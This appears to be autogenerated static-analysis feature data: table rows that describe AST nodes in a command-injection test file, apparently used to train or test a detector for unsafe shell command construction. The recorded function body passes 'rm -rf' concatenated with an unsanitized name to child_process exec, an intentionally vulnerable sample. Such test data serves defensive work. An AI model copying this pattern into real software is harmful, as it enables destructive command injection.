name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:16:496:2 | {\\n\\t\\tcp: ... ss')\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:16:496:2 | {\\n\\t\\tcp: ... ss')\\n\\t} | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:16:496:2 | {\\n\\t\\tcp: ... ss')\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:494:16:496:2 | {\\n\\t\\tcp: ... ss')\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:4 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:4 | cp | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:4 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:3:495:30 | cp: req ... ocess') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:13 | require | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:13 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:13 | require | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:13 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:13 | require | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | exceptional return of require ... ocess') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | exceptional return of require ... ocess') | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | exceptional return of require ... ocess') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | exceptional return of require ... ocess') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') | assignedToPropName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:7:495:30 | require ... ocess') | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:495:15:495:29 | 'child_process' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:7 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:7 | module | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:7 | module | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:7 | module | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:7 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:15 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:15 | module.exports | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:15 | module.exports | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:15 | module.exports | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:15 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:31 | module. ... ctThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:31 | module. ... ctThing | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:31 | module. ... ctThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:31 | module. ... ctThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:498:31 | module. ... ctThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:500:2 | module. ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:500:2 | module. ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:500:2 | module. ... T OK\\n\\t} | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:500:2 | module. ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:2:500:2 | module. ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:9:498:15 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:9:498:15 | exports | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:9:498:15 | exports | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:9:498:15 | exports | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:9:498:15 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:17:498:31 | myIndirectThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:17:498:31 | myIndirectThing | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:17:498:31 | myIndirectThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:17:498:31 | myIndirectThing | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:17:498:31 | myIndirectThing | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | MyThing | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | MyThing | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:498:35:498:34 | MyThing | enclosingFunctionBody | MyThing cp require child_process module exports myIndirectThing name MyThing cp exec rm -rf name | +| 